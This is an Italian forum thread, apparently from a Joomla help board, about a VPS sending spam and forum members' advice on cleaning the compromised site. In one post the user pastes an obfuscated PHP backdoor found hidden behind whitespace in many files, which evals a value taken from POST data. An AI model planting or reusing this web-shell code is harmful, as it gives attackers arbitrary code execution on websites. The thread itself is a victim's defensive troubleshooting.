Spam da VPS Cloud

[piero1976]

Ciao a tutti, ho un serio problema e spero che possiate aiutarmi.
Ho un sito su una VPS Cloud e da alcuni giorni l'hosting mi invia questa mail:


Gentile Cliente,       il nostro Anti-Spam ha individuato un invio di Spam dall'IP .......Per assicurare la sicurezza della nostra rete, il traffico in uscita dal tuo server verso la porta 25 è stato bloccato.    Trovi qui qualche esempio di email bloccate:   Destination IP: 64.233.166.26 - Message-ID: 1cec2da-2551e-98@auroranutriceutics.com - Spam score: 590Destination IP: 64.135.83.90 - Message-ID: 20151007212512.8D4A9665F1@vps201936.ovh.net - Spam score: 390Destination IP: 184.150.200.210 - Message-ID: 20151009045629.F02A67AC1F@vps201936.ovh.net - Spam score: 300Destination IP: 82.132.141.69 - Message-ID: 20151009023224.0831F7101C@vps201936.ovh.net - Spam score: 390Destination IP: 202.238.84.13 - Message-ID: 20151008072428.3E1DE6CDC6@vps201936.ovh.net - Spam score: 390

penso che qualcuno abbia istallato qualche script che facci uscire lo spam.

Come posso risalire a cosa sia che fa uscire questo spam?

Spero possiate aiutarmi perche questa situazione mi sta creando dei problemi.

Piero

[Pajot]

Ciao Piero, molto probabilmente Si tratta di Email Spoofing


Controlla il tuo Account:[/size]Cambia la tua password, andando nell’area di Gestione dei tuoi dati personali e annotala subito per non dimenticarla[/color][/size]Elimina i contatti mail che non conosci dalla tua rubrica[/color][/size]Fai un controllo sugli Account secondari che hai sulla tua Webmail ed elimina quelli che non riconosci[/color][/size]Cambia la password dei tuoi Account secondari[/color]

• [/size]Controlla e in caso [/color][/size]disattiva la risposta automatica[/color][/size] [/color]

[/size][/color]
[/size] Verifica la presenza di messaggi falsificati:[/color][/size][/color]

• Le mail falsificate sembrano provenire dal tuo account email, ma in realtà non partono dal tuo account che non è interessato dalla attività fraudolenta

• I provider di mail non possono impedire che i propri nomi di dominio vengano falsificati e non possono fermare l’invio di Spam da sistemi da loro non controllati nè controllabili

• Per fermare questo tipo di Spam bisogna rivolgersi al provider che sta inviando i messaggi

• Per riconoscere questo tipo di Spam è necessario avere accesso a uno dei messaggi falsificati (ossia ad uno dei messaggi ricevuti, a tua insaputa, dai tuoi contatti) e verificare le informazioni contenute nell’Header.  Se ad esempio, la lettura del messaggio avviene sulla Webmail di Libero, occorre aprirlo in lettura, poi cliccare su Altre azioni e quindi su Mostra intestazioni

• Nell’ultima delle righe “Received” dell’intestazione completa, prendi nota dell’indirizzo IP di origine che corrisponde all’ISP (Internet Service Provider) del mittente

• Cerca l’indirizzo IP in un sito come http://whois.domaintools.com/ per stabilire quale ISP fornisce l’accesso Internet a quel mittente[/size][/font]

• Contatta il rispettivo ISP tramite un indirizzo Abuse messo a disposizione, per chiedere che il mittente venga bloccato per Spam

• [/size]Ulteriore procedura che potrebbe essere utile:[/color]
  [/size]1) arrestare l'invio di email (fermando il mailserver);[/size]2) controllare la coda email e rimuovere le email "fraudolente" o sospette3) sbloccare l'invio come indicato di seguito;4) riavviare il mailserver.

[/list]

[piero1976]

Buongiorno, credo che la situazione sia più complicata, l'hosting ha gia bloccato il mio ip, se vado nelle impostazioni di posta sul server della VPS in coda ci sono una marea di messaggi che continuano a generarsi, credo che ci sia uno script in qualche file del mio sito che genera questo ma non so come individuarlo, ho gia provveduto a cambiare password

[tomtomeight]

Sicuramente è qualche script malevole che genera lo spam, dovresti spostare in locale tutti i file e directory che hai adesso tranne il file configuration.php e .htaccess, copiare poi una distribuzione joomla stessa versione, tranne la cartella installation in remoto. A questo punto il sito dovrebbe funzionare parzialmente ma non generare più spam, se così provi a caricare in remoto i file e cartelle che mancano e che ti danno errori, incomincia con le cartelle images, media e man mano quelle dei plugin, moduli ed estensioni che avevi installato. E raccomandato di farlo una ad una e verificare se lo spam riprende così da capire l'origine. Tieni presente che lo script non sarà presente in una sola parte ma in più parti. La procedura è lenta e laboriosa, ma se non hai un backup funzionante e non vuoi rifare il sito è l'unico sistema. Il db non dovrebbe essere interessato salvo per script nei contenuti, ma quello lo verifichi leggendo i contenuti.

[piero1976]

grazie, questa sera provo e ti faccio sapere se riesco a risolvere, cosa intendi per "Il db non dovrebbe essere interessato salvo per script nei contenuti, ma quello lo verifichi leggendo i contenuti."

[tomtomeight]

Intendo che il database dovrebbe essere immune, ma non è detto, comunque te ne accorgi visionando i contenuti, se presentano codici e link strani.

[piero1976]

esaminando la cartella scaricata in locale trovo parecchi file con questo codice nascosto tutto a destra


<?php                                                                                                                                                                                                                                                               $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q7f69dd'])){eval(${$s20}['q7f69dd']);}?>


ora sto eliminando il codice da tutti i file che mi segnala l'antivirus e sono parecchi!
Ma com'è potuto succedere?

[tonicopi]

Sei sicuro di avere tutto aggiornato?
Versione di joomla e  tutte le estensioni? I template?
Io per quanto segua un sito mi dimentico sempre qualcosa... 

[piero1976]

Si ho aggiornato ma evidentemente troppo tardi!

[piero1976]

Dunque, ho ripulito il codice che l'antivirus mi segnalava ma il problema persiste

[piero1976]

Nulla, non sono riuscito a risolvere, ho dovuto ripristinare un bk vecchio di un mese e rifare tutto il lavoro fatto in quel mese!
spero che non ci sia qualcosa di nascosto che si riavvii!!!

[piero1976]

Purtroppo il problema è ripartito!!!